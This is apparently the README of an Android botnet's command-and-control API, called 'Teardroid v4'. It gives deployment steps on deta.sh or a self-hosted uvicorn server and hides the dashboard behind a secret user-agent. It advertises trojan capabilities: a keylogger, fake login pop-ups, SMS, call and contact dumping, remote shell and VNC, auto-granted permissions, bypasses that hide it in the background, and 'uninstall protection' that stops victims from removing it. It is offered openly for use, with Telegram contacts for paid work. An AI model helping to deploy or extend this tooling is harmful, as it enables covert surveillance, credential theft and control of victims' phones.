Teardroid v4 Botnet API
This api is for teardroid v4 botnet
Please visit https://github.com/ScRiPt1337/Teardroid-phprat to know about teardroid and how to use it
- Set up an account at deta.sh
- Click here to fork this repo into your github account and click create fork
- Teardroidv4_api repo will be forked into your account
- Open the forked repo and click on config.py file and Change the value of "hello" to any user_agent or text you want
- https://go.deta.dev/deploy?repo=your-repo-url reaplce your-repo-url with the url of your forked repo and open it on browser
- and click deploy
- change your user-agent of the browser with the value of USER_AGENT you have enter in config.py
- you can use this chrome extension to change user useragent extension
- DONE
- Clone Teardroidv4_api repo using the command below
$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
- Install uvicorn
$ sudo apt-get install uvicorn
$ python3 -m pip install uvicorn
- Change dir to Teardroidv4_api
$ cd Teardroidv4_api
- Install all dependency
$ pip install -r requirements.txt
- change project key to connect with database
- Set up an account at deta.sh and go to project keys and create a new key and copy it
$ nano ./db/database.py
from deta import Deta
from os import getenv
deta = Deta(getenv("DETA_PROJECT_KEY")) => deta = Deta("demo project key")
# replace getenv("DETA_PROJECT_KEY") with your deta.sh project key
# make sure your remove getenv
- open config.py and change the value of "hello" to any user_agent or text you want
- Run teardroid api
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host 0.0.0.0 --port 80
# now close your terminal windows and we are good to go
- Change your user-agent of the browser with the value of USER_AGENT you have enter in config.py
- you can use this chrome extension to change user useragent extension
- Done
- Forground service bypass scatter does not show any notification while running in background.
- Auto launch bypass even in Chinese phone like redmi oppo vivo without auto launch permission.
- Does _not_create network logs in idle mode only make HTTP connection when-command.is-executed.
- Android battery optimization bypass without any permission.
- Keylogger
- logs (log everything user click on)
- notification capture
- run ussd code
- fake notification attack
- injection
- popup fake login screen
- geo fencing
- dump sms calls contact apps
- download file
- shell command
- open url
- open apps
- auto allow permission
- uninstall protection (stop the victim from uninstalling the app)
- vnc
- take screenshot
- automatically take screenshot when user open any specific app
- block number ( you can block number from victim device so the number can't call the victim )
- Demo video available on my telegram channel => https://t.me/scatter1337
- Pm me on telegram https://t.me/script1337
- for paid project contact me on telegram
- I am only available on telegram and script1337 is my only account please double check the username
- you will not be able to access the dashboard if you dont change your user-agent with the same value of USER_AGENT inside config.py file.
- its to make you the dashboard more secure and to protect it from geting auto deleted from deta.sh